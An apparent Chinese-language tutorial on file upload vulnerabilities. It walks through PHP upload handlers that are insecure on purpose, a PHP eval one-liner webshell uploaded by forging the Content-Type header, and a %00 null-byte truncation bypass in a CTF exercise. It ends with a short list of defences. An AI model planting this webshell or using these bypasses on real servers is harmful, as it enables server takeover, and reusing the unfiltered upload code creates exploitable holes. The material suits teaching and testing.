0x00 什麼是文件上傳
爲了讓用戶將文件上傳到網站,就像是給危機服務器的惡意用戶打開了另一扇門。即便如此,在今天的現代互聯網的Web應用程序,它是一種常見的要求,因爲它有助於提高業務效率。企業支持門戶,給用戶各企業員工有效地共享文件。允許用戶上傳圖片,視頻,頭像和許多其他類型的文件。向用戶提供的功能越多,Web應用受到***的風險和機會就越大,這種功能會被惡意用戶利用,獲得到一個特定網站的權限,或危及服務器的可能性是非常高的。
0x01 爲什麼文件上傳存在漏洞
上傳文件的時候,如果服務器腳本語言,未對上傳的文件進行嚴格的驗證和過濾,就容易造成上傳任意文件,包括上傳腳本文件。
如果是正常的PHP文件,對服務器則沒有任何危害。
PHP可以像其他的編程語言一樣,可以查看目錄下的文件,查看文件中的嗎內容,可以執行系統命令等。
上傳文件的時候,如果服務器端腳本語言,未對上傳的文件進行嚴格的驗證和過濾,就有可能上傳惡意的PHP文件,從而控制整個網站,甚至是服務器。這個惡意的PHP文件,又被稱爲WebShell。
0x02 哪裏存在文件上傳漏洞
服務器配置不當
開源編輯器的上傳漏洞
本地文件上傳限制被繞過
過濾不嚴或被繞過
文件解析漏洞導致文件執行
文件路徑截斷
0x03 文件上傳實例(本地測試)
嘿嘿嘿?one
<!DOCTYPE html>
<html>
<head>
<title>文件信息</title>
</head>
<meta charset="utf-8">
<body>
<form action="" enctype="multipart/form-data" method="POST" name="uploadfile">
上傳文件: <input type="file" name="upfile" />
<input type="submit" value="上傳" name="submit">
</form>
</body>
</html>
<!-- 完全沒有過濾,任意文件上傳 -->
<?php
if (isset($_POST['submit'])) {
var_dump($_FILES['upfile']);
echo "文件名:".$_FILES['upfile']['name']."<br />";
echo "文件大小:".$_FILES['upfile']['size']."<br />";
echo "文件類型:".$_FILES['upfile']['type']."<br />";
echo "臨時路徑:".$_FILES['upfile']['tmp_name']."<br />";
echo "上傳後系統返回值:".$_FILES['upfile']['error']."<br />";
echo "====================保存分各線========================<br />";
if ($_FILES['upfile']['error'] == 0) {
if (!is_dir("./upload")) {
mkdir("./upload");
}
$dir = "./upload/".$_FILES['upfile']['name'];
move_uploaded_file($_FILES['upfile']['tmp_name'],$dir);
echo "文件保存路徑:".$dir."<br />";
echo "上傳成功...<br />";
echo "圖片預覽:<br />";
echo "<img src=".$dir.">";
}
}
?>
設置本地代理用Burp Suite 抓包,通過對比我們可以看到,PHP中的<文件名>和<文件類型>分別對應數據包中<filename>和<Content-Type>。
嘿嘿嘿?two
<!DOCTYPE html>
<html>
<head>
<title>文件信息</title>
</head>
<meta charset="utf-8">
<body>
<form action="" enctype="multipart/form-data" method="POST" name="uploadfile">
上傳文件: <input type="file" name="upfile" />
<input type="submit" value="上傳" name="submit">
</form>
</body>
</html>
<!-- 按文件類型過濾 -->
<?php
if (isset($_POST['submit'])) {
var_dump($_FILES['upfile']);
echo "文件名:".$_FILES['upfile']['name']."<br />";
echo "文件大小:".$_FILES['upfile']['size']."<br />";
echo "文件類型:".$_FILES['upfile']['type']."<br />";
echo "臨時路徑:".$_FILES['upfile']['tmp_name']."<br />";
echo "上傳後系統返回值:".$_FILES['upfile']['error']."<br />";
echo "====================保存分各線========================<br />";
$flag = 0;
switch ($_FILES['upfile']['type']) {
case 'image/jpeg':
$flag = 1;
break;
default:
die("文件類型錯誤.....");
break;
}
if ($_FILES['upfile']['error'] == 0 && $flag ) {
if (!is_dir("./upload")) {
mkdir("./upload");
}
$dir = "./upload/".$_FILES['upfile']['name'];
move_uploaded_file($_FILES['upfile']['tmp_name'],$dir);
echo "文件保存路徑:".$dir."<br />";
echo "上傳成功...<br />";
echo "圖片預覽:<br />";
echo "<img src=".$dir.">";
}
}
?>在這段代碼裏,我們通過 <$_FILES['upfile']['type']> 來檢測文件上傳的類型,通過第一個圖裏的對比我們知道Http數據包請求頭裏的<Content-Type >對應的是上傳文件的類型,那麼我們是不是可以通過修改數據包的內容來實驗繞過.ok,現在我們上傳一個PHP一句話***。
<?php @eval($_POST['xxx']); echo "dahuiji...."; ?>
看返回的頁面我們知道我們成功繞過了對文件類型的檢測,並且菜刀連接成功
嘿嘿嘿?three(一個十六進制的<00>截斷的ctf)
url:http://ctf4.shiyanbar.com/web/upload/
首先我們對抓取的數據包做出以上修改
通過16進制我們知道 <.>的16進制是<2e>在<2e>出插入一個字節,右鍵菜單裏有<insert byte>插入。
ok,現在我們成功獲取了flag。
現在我們說下這個實驗的實現原理:
1.爲什麼在文件後面加上<.jpg>和在數據包<uploads/>後面加上修改後的文件名? PHP在對文件後綴進行判斷時是對最後一個 <.xxx> 來判斷的。這樣我們修改過後的文件 名,PHP會將其判斷爲.jpg文件這樣我們可以繞過對文件名的檢測。 2.爲什麼我們對文件名修改過後還需要添加%00截斷? 儘管我們知道我們上傳的是一個PHP文件,但是如果不進行%00截斷,我們上傳的文件在服務 器上是以<xxx.php.jpg>格式保存也就是說這是一個圖片文件,PHP是不會解析這個文件。 當我們進行%00截斷後,服務器就會將%00後的<.jpg>進行截斷,這是我們的的文件將以<xxx.php> 的形式保存在服務器上,我們的一句話***也就成功的時上傳成功了。
Part Four
<!DOCTYPE html>
<html>
<head>
<title>文件信息</title>
</head>
<meta charset="utf-8">
<body>
<form action="" enctype="multipart/form-data" method="POST" name="uploadfile">
上傳文件: <input type="file" name="upfile" />
<input type="submit" value="上傳" name="submit">
</form>
</body>
</html>
<?php
if (isset($_POST['submit'])) {
var_dump($_FILES['upfile']);
echo "文件名:".$_FILES['upfile']['name']."<br />";
echo "文件大小:".$_FILES['upfile']['size']."<br />";
echo "文件類型:".$_FILES['upfile']['type']."<br />";
echo "臨時路徑:".$_FILES['upfile']['tmp_name']."<br />";
echo "上傳後系統返回值:".$_FILES['upfile']['error']."<br />";
echo "====================保存分各線========================<br />";
$flag = 0;
$path_parts = pathinfo($_FILES['upfile']['name']);
echo '---<br>';
var_dump($path_parts); //返回文件路徑信息
if ($path_parts['extension'] == 'jpg' && $_FILES['upfile']['type'] == 'image/jpeg') {
$flag = 1;
}else{
die("文件類型錯誤....");
}
if ($_FILES['upfile']['error'] == 0 && $flag ) {
if (!is_dir("./upload")) {
mkdir("./upload");
}
$dir = "./upload/".$_FILES['upfile']['name'];
echo "文件保存路徑:".$dir."<br />";
move_uploaded_file($_FILES['upfile']['tmp_name'],$dir);
echo "上傳成功...<br />";
echo "圖片預覽:<br />";
echo "<img src=".$dir.">";
}
}
?>上傳一張正常的圖片。
上傳一句話***進行繞過檢測
爲什麼這次不能進行繞過? 我們對文件名進行截斷後,當數據包到Apache的時候,Apache會對截斷處理這時截斷的文件 名變爲<xxx.php>當PHP判斷時會發現文件的後綴爲<php>,然後我們就上傳失敗了.... (以上只是我對上傳失敗的一點理解,歡迎指正。 歡迎技術討論,可以將上述方法繞過的同學歡迎指教。 致謝...)
0x04 上傳漏洞的防禦
對面文件後綴進行檢測
對文件類型進行檢測
對文件內容進行檢測
設置上傳白名單